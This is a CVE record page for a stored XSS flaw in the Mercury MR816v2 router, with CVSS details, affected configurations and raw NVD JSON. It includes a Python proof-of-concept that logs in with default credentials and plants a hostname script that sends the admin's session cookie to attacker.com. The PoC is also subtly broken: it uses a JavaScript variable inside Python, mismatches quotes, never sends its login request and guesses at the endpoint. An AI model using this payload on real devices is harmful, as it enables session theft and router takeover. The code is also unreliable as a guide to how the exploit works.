Security Vulnerability Report
CVE-2025-65289 CVSS 6.1 MEDIUM

Published: 2025-12-09 17:15:56
Last Modified: 2025-12-12 14:31:38

Description

A stored Cross site scripting (XSS) vulnerability in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) router allows a remote attacker on the LAN to inject JavaScript into the router's management UI by submitting a malicious hostname. The injected script is stored and later executed in the context of an administrator's browser (for example after DHCP release/renew triggers the interface to display the stored hostname). Because the management interface uses weak/basic authentication and does not properly protect or isolate session material, the XSS can be used to exfiltrate the admin session and perform administrative actions.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:mercurycom:mr816_firmware:081c3114_4.8.7:build_110427:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mercurycom:mr816:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
Mercury MR816v2 081C3114 4.8.7 Build 110427 Rel 36550n

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-65289 PoC - Mercury MR816v2 Stored XSS
# Target: Mercury MR816v2 Router (Firmware 4.8.7 Build 110427 Rel 36550n)
# Attack Vector: Inject XSS payload in hostname field via LAN access

router_ip = "192.168.1.1"  # Default Mercury router IP
router_user = "admin"  # Default admin username
router_pass = "admin"  # Default admin password

# XSS payload to steal admin session
xss_payload = '<script>document.location="http://attacker.com/log?c=' + 'cookie=' + document.cookie + '&url=' + document.URL + '</script>'

def exploit_stored_xss():
    """
    Inject malicious hostname containing XSS payload
    The payload will be stored and executed when admin accesses the management interface
    """
    # Login to router management interface
    session = requests.Session()
    login_url = f"http://{router_ip}/login.cgi"
    login_data = {
        "username": router_user,
        "password": router_pass
    }

    # Send XSS payload in hostname field
    # Typical endpoint for DHCP client configuration
    host_config_url = f"http://{router_ip}/dhcp_client_set.cgi"
    host_config_data = {
        "hostname": xss_payload,
        "action": "save"
    }

    response = session.post(host_config_url, data=host_config_data)

    if response.status_code == 200:
        print("[+] XSS payload injected successfully!")
        print("[*] Payload will execute when admin views DHCP client list")
        print("[*] or triggers DHCP release/renew operation")
    else:
        print("[-] Failed to inject payload")

if __name__ == "__main__":
    print("CVE-2025-65289 PoC - Mercury MR816v2 Stored XSS")
    print("Target: LAN-attached Mercury MR816v2 Router")
    exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65289", "sourceIdentifier": "[email protected]", "published": "2025-12-09T17:15:55.727", "lastModified": "2025-12-12T14:31:38.323", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross site scripting (XSS) vulnerability in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) router allows a remote attacker on the LAN to inject JavaScript into the router's management UI by submitting a malicious hostname. The injected script is stored and later executed in the context of an administrator's browser (for example after DHCP release/renew triggers the interface to display the stored hostname). Because the management interface uses weak/basic authentication and does not properly protect or isolate session material, the XSS can be used to exfiltrate the admin session and perform administrative actions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", 
"value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mercurycom:mr816_firmware:081c3114_4.8.7:build_110427:*:*:*:*:*:*", "matchCriteriaId": "E679E997-793D-4C5A-AD18-DB222D262425"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mercurycom:mr816:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "360C10B2-75DF-445F-B772-0A99A82E1D91"}]}]}], "references": [{"url": "https://damiri.fr/en/cve/CVE-2025-65289", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}